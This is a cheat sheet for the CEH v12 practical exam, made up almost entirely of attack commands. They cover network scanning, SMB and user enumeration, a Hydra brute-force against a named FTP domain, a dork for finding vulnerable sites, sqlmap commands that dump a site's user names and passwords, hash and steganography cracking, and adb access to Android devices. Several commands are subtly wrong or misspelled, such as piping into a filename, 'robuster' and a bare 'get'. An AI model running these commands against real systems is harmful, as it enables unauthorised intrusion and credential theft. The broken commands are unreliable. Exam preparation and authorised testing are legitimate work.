CEH v12 practical resources
Strategy
Read all questions carefully
Enumerate sub-net
nmap -sn IP | tee nmap_ping_sweep.txt
nmap -n -sn 192.0.2.0/24 -oG - | awk '/Up$/{print $2}' > ip_list.txt
Enumerate ports
nmap -A -p- -v -iL ip_list.txt | nmap_port_scan.txt
Special Tools
Snow — Stegnography
Open Stego
Crypttool
PhoneSploit
Mobile DevicesBCTextEncoder
How many machines are active in a network - net discover -i 192.168.1.0/24
Connect to RDP via cmd
mstsc
Find DNS records
Scan the whole website
skipfish -o /root/test -S /usr/share/skipfish/dictionaries/complete.wl http://10.10.10.10:8080
-o output
-S wordlist
Brute force directories or files-
robuster dir -u 10.10.10.10 -w /usr/share/dirb/wordlists/common.txt -x .txt
OR
uniscan -u http://10.10.10.12:8080/CEH -q (for directories)
uniscan –u http://10.10.10.12:8080/CEH -we (enable file check like robots.txt and sitemap.xml)
To get the file from the server
get http://10.10.10.10/secret.txt
FTP Login - ftp <ip>
get <file name> (to get file from FTP login)
SSH Login - SSH [email protected]
Nmap scan
Nmap -A 10.10.10.10 (aggressive scan- Traceroute, T4, OS)
nmap -sC (service scan)
nmap -sV (version scan)
nmap -sP 10.10.10.10/24 (how many hosts are up in the whole network)/ping scan
nmap -sL (hostnames)
nmap -oN <filename> (to save output in a file)
nmap -F (fast scan)
nmap -O (os scan)
Crack the hashes-
hashid -m <hash> (to identify the type of hash, its mode etc)
hashcat -m <mode> -a 0 <hashhhhhhhh> /usr/share/wordlist/rockyou.txt
crackstation
Cyberchef
Enumeration
Global network inventory
Netbios enumerator
Hyena
Superscan
Advanced ip scanner
Nmap smb scripts
nmap --script smb-os-discovery.nse -p445 <ip> (enumerate os, domain name,etc)
nmap --script smb-enum-users.nse -p445 <ip> (used to enumerate all users on remote Windows system using SAMR enumeration and LSA bruteforcing)
nmap -p 445 --script=smb-enum-shares.nse, smb-enum-users.nse 10.10.19.21 (smb users and shares)
smbclient //10.10.19.21/anonymous (accessing smb shares)
smbget -R smb://10.10.19.21/anonymous (downloading smb files)
Enum4linux
enum4linux -u martin -p apple -U 10.10.10.12 | - u user -p pass -U get user list
enum4linux -u martin -p apple -o 10.10.10.12 | -o get OS info
enum4linux -u martin -p apple -P 10.10.10.12 | -P get password policy info
enum4linux -u martin -p apple -G 10.10.10.12 | -G get groups and members info
enum4linux -u martin -p apple -S 10.10.10.12 | -S get share list info
enum4linux -u martin -p apple -a 10.10.10.12 | -a get all simple enumeration data [-U -S -G -P -r -o -n -i]
Wpscan
wpscan --url http://[IP Address]:8080/CEH --enumerate u (enumerate the usernames stored in the website’s database)
Vulnerability analysis
nikto -h http://testphp.vulnweb.com/login.php -Tuning 1
Bruteforce
Hydra -L username -P /usr/share/wordlists/rockyou.txt ftp://xiotz.com
Cryptography
Hashcalc
Md5 calculator
Cryptool – decode .hex file
Bctextencoder – decrypt text using secret key
Veracrypt – anything related to volume
Crack hashes- hashes.com, cyberchef
Steganography-
Steghide embed -ef <filename> -cf <image> -p <passphrase>
Steghide extract -sf <image> (extract hidden data from image)
Stegcracker <image> /usr/share/wordlists/rockyou.txt (crack the passphrase of image)
https://futureboy.us/stegano/decinput.html (online steganography tool)
sha256sum <filename> (find hash of the file)
Android Hacking-
via USB
./adb tcpip 5555
./adb connect 192.168.43.117:5555
./adb devices
./adb -d shell (Direct an adb command to the only attached USB device)
ls
cd sdcard
ls
cd dcim
cd camera
ls
./adb push C:\platform-tools\ota.zip /sdcard/Download (from pc to android)
< pc location > <android location>
./adb pull /sdcard/Download/magisk_patched.img C:\platform-tools (from android to pc)
< android location > <pc location>
sqlmap-
site:http://testphp.vulnweb.com/ php?= (for finding vulnerable site)
(for cookies- console->document.cookie)
sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 --dbs (databases)
sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart –tables (tables)
sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart -T users --columns (columns)
(dump whole table)
sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart -T users --dump
OR
(dump individual column data)
sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart -T users -C uname --dump
sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart -T users -C pass --dump
Blogs and Dumps
https://medium.com/techiepedia/certified-ethical-hacker-practical-exam-guide-dce1f4f216c9
https://github.com/cmuppin/CEH
https://medium.com/techiepedia/certified-ethical-hacker-practical-exam-guide-dce1f4f216c9
Last updated